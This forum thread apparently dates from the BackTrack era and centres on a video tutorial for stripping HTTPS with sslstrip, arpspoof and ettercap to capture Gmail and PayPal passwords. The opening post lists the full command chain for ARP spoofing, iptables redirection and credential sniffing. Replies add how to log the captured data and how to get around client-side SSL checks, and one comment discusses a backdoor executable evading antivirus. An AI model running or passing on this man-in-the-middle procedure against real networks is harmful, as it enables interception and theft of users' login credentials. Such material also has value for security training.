Very nice tut - keep up the good work
[Video] Stripping SSL & Sniffing HTTPS (SSLStrip)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
Download video: http://www.mediafire.com/download.php?ykgjnkyejku
Commands: http://pastebin.com/fd6eadf7
What is this?
This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.
How does this work?
> Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
> Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
> SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
> ettercap then picks out the username & password.
What do I need?
> sslstrip
> arpspoof
> ettercap
*all in BackTrack 4 Pre Final*
Network Setup:
Targets IP: 192.168.1.6
Gateway : 192.168.1.1
Software
Name: sslstrip
Version: 0.2
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download
Commands:
Code:kate /etc/ettercap.conf >*uncomment redir_command_off in the iptables, linux section* echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1 iptables -t A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ettercap -T -q -i wlan0 sslstrip -a -k -f ettercap -T -q -i wlan0
Notes:
You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!
Video length: 03:55
Capture length: 4:41
Song: 16 Bit Lolitas - Nobody Seems To Care
Blog Post:http://g0tmi1k.blogspot.com/2009/07/videotutorial-how-to-snifff-ssl-https.html
Forum Post: http://forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html
~g0tmi1k
~ Have you, g0tmi1k? ~
:rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:
Very nice tut - keep up the good work
Nice tut... one small point - the exe for backdoor is getting cought by AV as trojan... grrrrr It can escape from half of the AV in Virustotal but .....
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
How do i save the packets?
Nice work, thanks for posting.
Great tune to roll with, I was sad when it cut out around halfway into the video but was no big deal. Nice Video and thanks again for sharing it for others.
15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
1000HE EEE 30 gig SSD 2 gigs Ram
kazalku,Originally Posted by kazalku
Thanks! But i'm not using SBD this time around!
evanuz,
I use:
You can then dosslstrip -a -k -f --write /root/output-ssl
freemymind,kate /root/output-ssl
OR
less /root/output-ssl
OR
nano /root/output-ssl | grep [username]
Thanks for the thanks!
The music cuts out!? :O *goes and checks*
Edit:
Yup - music was missing half way! Re-uploaded (blip.tv and mediafire - links updated!)
~ Have you, g0tmi1k? ~
:rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:
Great tutorial and tool but i had a few problems. Was able to get everything up and running no problem using the bt4 pre release but the experience for the user on the target pc was not very seamless.
While testing, I noticed that my target box was taking much longer to load sites (some didnt load at all). Many of the sites would hang with only half the page loaded and in some cases just timeout completely.
The attack was working and i was seeing my passwords in plaintext but I couldn't get it so that the target machine seemed unchanged. In many attempts I would log into my gmail account, but would never make it to my inbox. It would just hang or take me back to the login screen.
Anyone else have this problem?
Some websites check on the client side whether you are in SSL or not, which would be conducive to your issue here. Try proxying with a proper SSL proxy (ettercap has one) - you will get the self signed warning, but will probably succeed in testing your account.
I use a similar attack when the audit team requests access to particular information about a users browsing habits, it's good to be able to watch their ssl proxy usage sometimes.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
When SSLstrip 0.2 came out I got a copy form Moxie and wrote a tut here. Even put it on a rouge AP. Props to "DarkOperator" for that script. It was so slow we talked about porting it to C. This was not on pre though. Just BT4 beta. Is SSLstrip (not on a rouge AP) still ULTRA slow?
Onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
Ya i did a write up of running it under airbase .. its not really a prob with sslstrip but more a airbase limitation as you cant set the mtu size on the alfa card. Other cards should work however
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
Posting Permissions